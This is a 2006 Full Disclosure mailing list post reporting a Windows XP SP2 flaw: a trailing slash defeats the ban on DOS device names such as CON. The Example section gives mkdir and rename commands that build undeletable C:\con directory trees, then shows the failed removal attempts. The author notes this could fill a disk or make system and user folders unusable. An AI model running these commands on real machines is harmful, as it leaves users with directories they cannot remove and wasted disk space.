Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

DOS device name handling

From: Klaudiusz Kulik <kulikk () monstrum org>
Date: Mon, 1 May 2006 18:06:22 +0200
    Hi.

* Overview:
Valunerability exists in windows xp sp2 (others may also be affected),
probably due to an error within the handling special device DOS names.
In March 2000 Microsoft has patched similar problem in windows 98:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6

* Environment:
I tried this on polish windows xp sp2 with latest patches. Command outputs
are translated into english, so they are not identical as in english version
of xp.

* Description:
Using simple mkdir and rename commands it is possible to make directory
structure which then can not be removed from disk without special, third
party tools.
Because even empty directory ocuppies some amount of disk space, this
valunerability may be used against a user's machine by creating the millions
of prepared, not eraseable directories. Other scenario may be renaming
system or user's directory to invalid name.

* Details:
In a theory, windows does not allow programs to create directory containing
special DOS device names (e.g. CON, LPT1, COM1, PRN). By simply adding
a slash '/' character at the end of directory name, that protection fails.

* Example:
Assume we are on the root of drive C:

Creating...
mkdir "/foo/foo/foo/foo"

Valid directory structure C:\foo\foo\foo\foo created.

... and renaming:
cd \foo\foo\foo
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
C:\

Now directory structure is:
C:\con\con\con\con

Please note that this is one way operation. Renaming from "con/" or
"con" to "foo" does not work. However, if the directory has only one
level (C:\con) and is empty or contains ,,normal'' entries, it is
possible to remove it.


Now, let's try browse:

C:\cd "con"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\cd "con/"
Nazwa katalogu jest nieprawidłowa.
[Invalid directory name.]


Let's try to rename:

C:\rename "con" "foo"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\rename "con/" "foo"
Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]


And finally - removing:

C:\>rmdir /S "con/"
con/, Czy na pewno (T/N)? t
[Are You sure (Y/N)?]
con/\con\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con - Nie można odnaleźć określonego pliku.
con/\con - Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]

Directory exists.

C:\erase /S /Q "con"
Nie można odnaleźć \\.\con.
[Could not find \\.\con.]

Please note a strange path.

C:\erase /S /Q "con/"

C:\
Directory *still* exists.

Windows Explorer can browse directory, but renaming or removing fails.
It looks like there is no simple way to remove C:\con from a disk.

-- 
K.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: